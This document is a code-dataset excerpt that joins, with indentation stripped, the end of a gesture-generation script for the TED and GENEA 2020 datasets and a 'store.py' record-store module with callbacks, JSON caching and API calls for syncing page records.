if dataset.lower() == 'ted_db':
if 'clip_duration_range' not in data_params.keys():
data_params['clip_duration_range'] = [5, 12]
lmdb_env = lmdb.open(data_params['env_file'], readonly=True, lock=False)
clip_vid_name = ''
clip_frames_all = [-2, -2]
lmdb_env = lmdb.open(data_params['env_file'], readonly=True, lock=False)
with lmdb_env.begin(write=False) as txn:
keys = [key for key, _ in txn.cursor()]
samples_to_generate = len(keys)
print('Total samples to generate: {}'.format(samples_to_generate))
for sample_idx in range(samples_to_generate): # loop until we get the desired number of results
# if sample_idx < 11200:
# continue
# select video
if randomized:
key = np.random.choice(keys)
else:
key = keys[sample_idx]
buf = txn.get(key)
video = pyarrow.deserialize(buf)
vid_name = video[6]['vid']
if not(samples is None or any(vid_name in filename_prefix for filename_prefix in samples)):
continue
clip_poses = video[1]
clip_audio = video[3]
clip_words = video[0]
clip_frames = [video[6]['start_frame_no'], video[6]['end_frame_no']]
clip_time = [video[6]['start_time'], video[6]['end_time']]
if vid_name != clip_vid_name or clip_frames[0] - 1 > clip_frames_all[1]:
if clip_vid_name != '':
if randomized:
speaker_vid_idx = np.random.randint(0, self.test_speaker_model.n_words)
else:
speaker_vid_idx = 0
_ = self.render_clip(data_params, vid_name, sample_idx,
samples_to_generate, clip_poses_all, clip_audio_all,
data_params['audio_sr'], clip_words_all, clip_time_all,
test_samples=samples, speaker_vid_idx=speaker_vid_idx,
check_duration=check_duration, fade_out=fade_out,
make_video=make_video, save_pkl=save_pkl)
clip_vid_name = vid_name
clip_poses_all = video[1]
clip_audio_all = video[3]
clip_words_all = video[0]
clip_frames_all = [video[6]['start_frame_no'], video[6]['end_frame_no']]
clip_time_all = [video[6]['start_time'], video[6]['end_time']]
else:
frame_idx_last = clip_frames[0] - clip_frames_all[0]
clip_poses_all = np.concatenate((clip_poses_all[:frame_idx_last], clip_poses), axis=0)
clip_audio_all = np.concatenate((clip_audio_all[:int((clip_time[0] - clip_time_all[0]) * 16000)], clip_audio))
for word in clip_words:
if word not in clip_words_all:
clip_words_all.append(word)
clip_frames_all[1] = clip_frames[1]
clip_time_all[1] = clip_time[1]
elif dataset.lower() == 'genea_challenge_2020':
file_names = ['.wav'.join(f.split('.wav')[:-1]) for f in os.listdir(jn(data_params['data_path'], 'audio'))]
file_names.sort()
samples_to_generate = len(file_names)
print('Total samples to generate: {}'.format(samples_to_generate))
joint_indices_to_keep = [0, 4, 6, 7, 9, 10, 11, 28, 29, 30]
for f_idx, f in enumerate(file_names):
audio, sample_rate = librosa.load(jn(data_params['data_path'], 'audio', f + '.wav'),
mono=True, sr=16000, res_type='kaiser_fast')
j_names, _, _, joint_positions, _, frame_rate =\
MoCapDataset.load_bvh(jn(data_params['data_path'], 'bvh_raw', f + '.bvh'))
joint_positions_max = np.power(10., np.ceil(np.log10(np.max(joint_positions))))
joint_positions_min = np.min(joint_positions)
if joint_positions_min >= 0:
joint_positions_min = 0.
else:
joint_positions_min = -np.power(10., np.ceil(np.log10(np.abs(joint_positions_min))))
joint_positions_scaled =\
2. * (joint_positions - joint_positions_min) / (joint_positions_max - joint_positions_min) - 1.
with open(jn(data_params['data_path'], 'transcripts', f + '.json'), 'r') as jf:
data_dump = json.load(jf)
transcript = []
for json_data in data_dump:
words_with_timings = json_data['alternatives'][0]['words']
for word in words_with_timings:
transcript.append([word['word'],
float(word['start_time'][:-1]), float(word['end_time'][:-1])])
clip_time = [0., len(joint_positions) / np.round(frame_rate)]
if randomized:
speaker_vid_idx = np.random.randint(0, self.test_speaker_model.n_words)
else:
speaker_vid_idx = 0
clip_poses_resampled, out_poses_trimodal, out_poses =\
self.render_clip(data_params, f, f_idx, samples_to_generate,
joint_positions_scaled[:, joint_indices_to_keep],
audio, sample_rate, transcript, clip_time,
clip_idx=0, speaker_vid_idx=speaker_vid_idx,
check_duration=check_duration, fade_out=fade_out,
make_video=make_video, save_pkl=save_pkl)
end_time = time.time()
print('Total time taken: {:.2f} seconds.'.format(end_time - overall_start_time))
|
store.py | import datetime
import json
import threading
import uuid
from collections import defaultdict
from copy import deepcopy
from dictdiffer import diff
from inspect import signature
from threading import Lock
from pathlib import Path
from tzlocal import get_localzone
from .logger import logger
from .settings import CACHE_DIR
from .utils import extract_id
class MissingClass(object):
def __bool__(self):
return False
Missing = MissingClass()
class Callback(object):
def __init__(
self, callback, record, callback_id=None, extra_kwargs={}, watch_children=True
):
self.callback = callback
self.record = record
self.callback_id = callback_id or str(uuid.uuid4())
self.extra_kwargs = extra_kwargs
def __call__(self, difference, old_val, new_val):
kwargs = {}
kwargs.update(self.extra_kwargs)
kwargs["record"] = self.record
kwargs["callback_id"] = self.callback_id
kwargs["difference"] = difference
kwargs["changes"] = self.record._convert_diff_to_changelist(
difference, old_val, new_val
)
logger.debug("Firing callback {} with kwargs: {}".format(self.callback, kwargs))
# trim down the parameters we'll be passing, to include only those the callback will accept
params = signature(self.callback).parameters
if not any(["**" in str(param) for param in params.values()]):
# there's no "**kwargs" in the callback signature, so remove any unaccepted params
for arg in list(kwargs.keys()):
if arg not in params:
del kwargs[arg]
# perform the callback, gracefully handling any exceptions
try:
# trigger the callback within its own thread, so it won't block others if it's long-running
threading.Thread(target=self.callback, kwargs=kwargs, daemon=True).start()
except Exception as e:
logger.error(
"Error while processing callback for {}: {}".format(
repr(self.record), repr(e)
)
)
def __eq__(self, val):
if isinstance(val, str):
return self.callback_id.startswith(val)
elif isinstance(val, Callback):
return self.callback_id == val.callback_id
else:
return False
class RecordStore(object):
def __init__(self, client, cache_key=None):
self._mutex = Lock()
self._client = client
self._cache_key = cache_key
self._values = defaultdict(lambda: defaultdict(dict))
self._role = defaultdict(lambda: defaultdict(str))
self._collection_row_ids = {}
self._callbacks = defaultdict(lambda: defaultdict(list))
self._records_to_refresh = {}
self._pages_to_refresh = []
with self._mutex:
self._load_cache()
def _get(self, table, id):
return self._values[table].get(id, Missing)
def add_callback(self, record, callback, callback_id=None, extra_kwargs={}):
assert callable(
callback
), "The callback must be a 'callable' object, such as a function."
self.remove_callbacks(record._table, record.id, callback_id)
callback_obj = Callback(
callback, record, callback_id=callback_id, extra_kwargs=extra_kwargs
)
self._callbacks[record._table][record.id].append(callback_obj)
return callback_obj
def remove_callbacks(self, table, id, callback_or_callback_id_prefix=""):
"""
Remove all callbacks for the record specified by `table` and `id` that have a callback_id
starting with the string `callback_or_callback_id_prefix`, or are equal to the provided callback.
"""
if callback_or_callback_id_prefix is None:
return
callbacks = self._callbacks[table][id]
while callback_or_callback_id_prefix in callbacks:
callbacks.remove(callback_or_callback_id_prefix)
def _get_cache_path(self, attribute):
return str(
Path(CACHE_DIR).joinpath("{}{}.json".format(self._cache_key, attribute))
)
def _load_cache(self, attributes=("_values", "_role", "_collection_row_ids")):
if not self._cache_key:
return
for attr in attributes:
try:
with open(self._get_cache_path(attr)) as f:
if attr == "_collection_row_ids":
self._collection_row_ids.update(json.load(f))
else:
for k, v in json.load(f).items():
getattr(self, attr)[k].update(v)
except (FileNotFoundError, ValueError):
pass
def set_collection_rows(self, collection_id, row_ids):
if collection_id in self._collection_row_ids:
old_ids = set(self._collection_row_ids[collection_id])
new_ids = set(row_ids)
added = new_ids - old_ids
removed = old_ids - new_ids
for id in added:
self._trigger_callbacks(
"collection",
collection_id,
[("row_added", "rows", id)],
old_ids,
new_ids,
)
for id in removed:
self._trigger_callbacks(
"collection",
collection_id,
[("row_removed", "rows", id)],
old_ids,
new_ids,
)
self._collection_row_ids[collection_id] = row_ids
self._save_cache("_collection_row_ids")
def get_collection_rows(self, collection_id):
return self._collection_row_ids.get(collection_id, [])
def _save_cache(self, attribute):
if not self._cache_key:
return
with open(self._get_cache_path(attribute), "w") as f:
json.dump(getattr(self, attribute), f)
def _trigger_callbacks(self, table, id, difference, old_val, new_val):
for callback_obj in self._callbacks[table][id]:
callback_obj(difference, old_val, new_val)
def get_role(self, table, id, force_refresh=False):
self.get(table, id, force_refresh=force_refresh)
return self._role[table].get(id, None)
def get(self, table, id, force_refresh=False):
id = extract_id(id)
# look up the record in the current local dataset
result = self._get(table, id)
# if it's not found, try refreshing the record from the server
if result is Missing or force_refresh:
if table == "block":
self.call_load_page_chunk(id)
else:
self.call_get_record_values(**{table: id})
result = self._get(table, id)
return result if result is not Missing else None
def _update_record(self, table, id, value=None, role=None):
callback_queue = []
with self._mutex:
if role:
logger.debug("Updating 'role' for {}/{} to {}".format(table, id, role))
self._role[table][id] = role
self._save_cache("_role")
if value:
logger.debug(
"Updating 'value' for {}/{} to {}".format(table, id, value)
)
old_val = self._values[table][id]
difference = list(
diff(
old_val,
value,
ignore=["version", "last_edited_time", "last_edited_by"],
expand=True,
)
)
self._values[table][id] = value
self._save_cache("_values")
if old_val and difference:
logger.debug("Value changed! Difference: {}".format(difference))
callback_queue.append((table, id, difference, old_val, value))
# run callbacks outside the mutex to avoid lockups
for cb in callback_queue:
self._trigger_callbacks(*cb)
def call_get_record_values(self, **kwargs):
"""
Call the server's getRecordValues endpoint to update the local record store. The keyword arguments map
table names into lists of (or singular) record IDs to load for that table. Use True to refresh all known
records for that table.
"""
requestlist = []
for table, ids in kwargs.items():
# ensure "ids" is a proper list
if ids is True:
ids = list(self._values.get(table, {}).keys())
if isinstance(ids, str):
ids = [ids]
# if we're in a transaction, add the requested IDs to a queue to refresh when the transaction completes
if self._client.in_transaction():
self._records_to_refresh[table] = list(
set(self._records_to_refresh.get(table, []) + ids)
)
continue
requestlist += [{"table": table, "id": extract_id(id)} for id in ids]
if requestlist:
logger.debug(
"Calling 'getRecordValues' endpoint for requests: {}".format(
requestlist
)
)
results = self._client.post(
"getRecordValues", {"requests": requestlist}
).json()["results"]
for request, result in zip(requestlist, results):
self._update_record(
request["table"],
request["id"],
value=result.get("value"),
role=result.get("role"),
)
def get_current_version(self, table, id):
values = self._get(table, id)
if values and "version" in values:
return values["version"]
else:
return -1
def call_load_page_chunk(self, page_id):
if self._client.in_transaction():
self._pages_to_refresh.append(page_id)
return
data = {
"pageId": page_id,
"limit": 100000,
"cursor": {"stack": []},
"chunkNumber": 0,
"verticalColumns": False,
}
recordmap = self._client.post("loadPageChunk", data).json()["recordMap"]
self.store_recordmap(recordmap)
def store_recordmap(self, recordmap):
for table, records in recordmap.items():
for id, record in records.items():
self._update_record(
table, id, value=record.get("value"), role=record.get("role")
)
def call_query_collection(
self,
collection_id,
collection_view_id,
search="",
type="table",
aggregate=[],
filter=[],
filter_operator="and",
sort=[],
calendar_by="",
group_by="",
):
# convert singletons into lists if needed
#if isinstance(aggregate, dict):
#aggregate = [aggregate]
#if isinstance(filter, dict):
#filter = [filter]
#if isinstance(sort, dict):
#sort = [sort]
data = {
"collectionId": collection_id,
"collectionViewId": collection_view_id,
"loader": {
"limit": 10000,
"loadContentCover": True,
"searchQuery": search,
"userLocale": "en",
"userTimeZone": str(get_localzone()),
"type": type,
},
"query": {
"aggregate": aggregate,
"filter": filter,
"filter_operator": filter_operator,
"sort": sort,
},
}
response = self._client.post("queryCollection", data).json()
self.store_recordmap(response["recordMap"])
return response["result"]
def handle_post_transaction_refreshing(self):
for block_id in self._pages_to_refresh:
self.call_load_page_chunk(block_id)
self._pages_to_refresh = []
self.call_get_record_values(**self._records_to_refresh)
self._records_to_refresh = {}
def run_local_operations(self, operations):
"""
Called to simulate the results of running the operations on the server, to keep the record store in sync
even when we haven't completed a refresh (or we did a refresh but the database hadn't actually updated yet...)
"""
for operation in operations:
self.run_local_operation(**operation)
def run_local_operation(self, table, id, path, command, args):
with self._mutex:
path = deepcopy(path)
new_val = deepcopy(self._values[table][id])
ref = new_val
# loop and descend down the path until it's consumed, or if we're doing a "set", there's one key left
while (len(path) > 1) or (path and command != "set"):
comp = path.pop(0)
if comp not in ref:
ref[comp] = [] if "list" in command else {}
ref = ref[comp]
if command == "update":
assert isinstance(ref, dict)
ref.update(args)
elif command == "set":
assert isinstance(ref, dict)
if path:
ref[path[0]] = args
else:
# this is the case of "setting the top level" (i.e. creating a record)
ref.clear()
ref.update(args)
elif command == "listAfter":
assert isinstance(ref, list)
if "after" in args:
ref.insert(ref.index(args["after"]) + 1, args["id"])
else:
ref.append(args["id"])
elif command == "listBefore":
assert isinstance(ref, list)
if "before" in args:
ref.insert(ref.index(args["before"]), args["id"])
else:
ref.insert(0, args["id"])
elif command == "listRemove":
try:
ref.remove(args["id"])
except ValueError:
pass
self._update_record(table, id, value=new_val)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.